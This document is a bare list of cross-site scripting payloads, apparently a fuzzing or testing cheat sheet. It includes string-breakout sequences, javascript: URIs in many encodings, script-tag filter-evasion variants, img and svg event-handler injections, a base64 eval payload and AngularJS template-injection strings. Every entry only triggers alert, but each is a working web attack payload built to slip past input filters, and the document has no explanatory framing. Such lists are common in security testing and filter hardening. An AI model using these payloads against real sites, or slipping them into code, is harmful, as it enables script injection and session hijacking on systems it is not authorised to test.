'';! - "<XSS>=&{()}
\'-alert(1)//
\';alert(1)//
\"-alert(1)}//
alert`xss`;
'-alert(1)-'
'}alert(1);{'
'}alert(1)%0A{'
';-alert(1)//
\'}alert(1);{//
&apos;-alert(1)-&apos;
&#x27-alert(1)-&#x27
"onmouseover="alert(1)
onerror=alert`1`
param=abc`;return+false});});alert`xss`;</script>
return+false});
});
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript&colon;alert(1)
javascript&#x003A;alert(1)
javascript&#58;alert(1)
&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3aalert(1)
<script>alert(1)</script>
<script>\u0061lert(2)</script>
<script>\u{61}lert(3)</script>
<script>\u{0000000061}lert(4)</script>
<%00script>alert(5)</script>
<script>al%00ert(6)</script>
script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script      ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
<<script>alert("XSS");//<</script>
<img src=x onerror=alert(7) />
<img/src=x a='' onerror=alert(8)>
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<svg/onload=alert``>
<svg onload=alert('XSS')>
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
<svg onload=alert(1)>
"><svg onload=alert(1)>
<svg><x><script>alert('1'&#41</x>
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
<iframe src="javascript:alert(1)">
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{{}.")));alert(1)//"}}